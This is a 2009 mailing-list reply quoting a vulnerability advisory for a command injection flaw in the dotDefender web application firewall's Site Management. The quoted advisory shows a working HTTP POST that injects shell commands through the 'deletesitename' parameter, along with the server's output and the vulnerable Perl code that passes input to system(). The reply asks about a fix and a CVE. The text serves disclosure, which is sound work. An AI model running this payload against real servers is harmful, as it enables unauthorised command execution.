On Mon, 30 Nov 2009 16:48:49 +0100 John Dos <dotdefeater@xxxxxxxxxxxxxx> wrote: > Problem Description > =================== > > A remote command execution vulnerability exists in the dotDefender > (3.8-5) Site Management. > > > dotDefender [1] is a web appliaction firewall (WAF) which 'prevents > hackers from attacking your > website.' > > > Technical Details > ================= > > The Site Management application of dotDefender is reachable as a web > application (https:site/dotDefender/) > on the webserver. After passing the Basic Auth login you can > create/delete applications. > The mentioned vulnerability is in the 'deletesite' implementation and > the 'deletesitename' variable. > Insufficient input validation allows an attacker to inject arbitrary > commands. > > > Delete Site > =========== > > A normal delete transaction looks as follow: > > POST /dotDefender/index.cgi HTTP/1.1 > Host: 172.16.159.132 > User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; > rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 > Accept: > text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 > Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate > Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 > Keep-Alive: 300 > Connection: keep-alive > Referer: https://172.16.159.132/dotDefender/index.cgi > Authorization: Basic YWRtaW46 > Cache-Control: max-age=0 > Content-Type: application/x-www-form-urlencoded > Content-Length: 76 > > sitename=dotdefeater&deletesitename=dotdefeater&action=deletesite&linenum=14 > > An attack looks like: > > --------------------/Request/-------------------- > POST /dotDefender/index.cgi HTTP/1.1 > Host: 172.16.159.132 > User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; > rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 > Accept: > text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 > Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate > Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 > Keep-Alive: 300 > Connection: keep-alive > Referer: https://172.16.159.132/dotDefender/index.cgi > Authorization: Basic YWRtaW46 > Cache-Control: max-age=0 > Content-Type: application/x-www-form-urlencoded > Content-Length: 95 > > sitename=dotdefeater&deletesitename=dotdefeater;id;ls -al > ../;pwd;&action=deletesite&linenum=15 > > --------------------/Response/-------------------- > [...] > <br> > uid=33(www-data) gid=33(www-data) groups=33(www-data) > total 12 > drwxr-xr-x 3 root root 4096 Nov 23 02:37 . > drwxr-xr-x 9 root root 4096 Nov 23 02:37 .. > drwxr-xr-x 7 www-data 99 4096 Nov 23 07:11 admin > /usr/local/APPCure-full/lib/admin > uid=33(www-data) gid=33(www-data) groups=33(www-data) > total 12 > drwxr-xr-x 3 root root 4096 Nov 23 02:37 . > drwxr-xr-x 9 root root 4096 Nov 23 02:37 .. > drwxr-xr-x 7 www-data 99 4096 Nov 23 07:11 admin > /usr/local/APPCure-full/lib/admin > uid=33(www-data) gid=33(www-data) groups=33(www-data) > total 12 > drwxr-xr-x 3 root root 4096 Nov 23 02:37 . > drwxr-xr-x 9 root root 4096 Nov 23 02:37 .. > drwxr-xr-x 7 www-data 99 4096 Nov 23 07:11 admin > /usr/local/APPCure-full/lib/admin > uid=33(www-data) gid=33(www-data) groups=33(www-data) > total 12 > drwxr-xr-x 3 root root 4096 Nov 23 02:37 . > drwxr-xr-x 9 root root 4096 Nov 23 02:37 .. > drwxr-xr-x 7 www-data 99 4096 Nov 23 07:11 admin > /usr/local/APPCure-full/lib/admin > [...] > > > > Affected Code > ============= > > The affected code (perl) is in index1.cgi of the admin interface: > > 311 > 312 }elsif($action eq "deletesite") { > # delete site > 313 $deletesitename=$postFields{"deletesitename"}; > 314 $dots_index = index($deletesitename,"%3A"); > 315 > 316 if($dots_index != -1 ) { > 317 $site_a_part= > substr($deletesitename,0,$dots_index); 318 $site_b_part= > substr($deletesitename,$dots_index+3,length($deletesitename)-$dots_index-2); > 319 $site_a_part=&cleanIt($site_a_part); > 320 $site_b_part=&cleanIt($site_b_part); > 321 $deletesitename = $site_a_part.":".$site_b_part; > 322 } > 323 > 324 $linenum=$postFields{'linenum'}; > 325 applyDbAudit($action); > 326 &delline($linenum,2); > 327 cleanSiteFingerPrints($deletesitename); > 328 > 329 &deleteSiteConf($deletesitename); > 330 $site_params="$CTMP_DIR/".$deletesitename."_params"; > 331 system("rm -f $site_params"); > > > And applicure-lib2.pl: > > 13 sub cleanIt { > 14 my($param,$type)=@_; > 15 > 16 $param =~ s/%([a-fA-F0-9]{2})/pack "H2", $1/eg; > 17 if ($type eq 'any') { > 18 } elsif ($type eq 'filter') { > 19 $param =~ s/\+/" "/eg; > 20 } elsif ($type eq 'path') { > 21 $param = un_urlize($param); > 22 #$param =~ s/([^A-Za-z0-9\-_.\/~'])//g; > 23 #$param =~ s/\+/" "/eg; > 24 } else { > 25 $param =~ s/([^A-Za-z0-9\-_.~'])//g; > 26 } > 27 return $param; > 28 } > > > Here one can see that certain shell control characters are not > protected by the call to cleanIt. Thus an attacker > can gain control of the system call in line 331 of index1.cgi. > > > References > =========== > > [1] http://applicure.com/ Have they fixed this issue? Does this have CVE-identifier assigned? --- Henri Salo
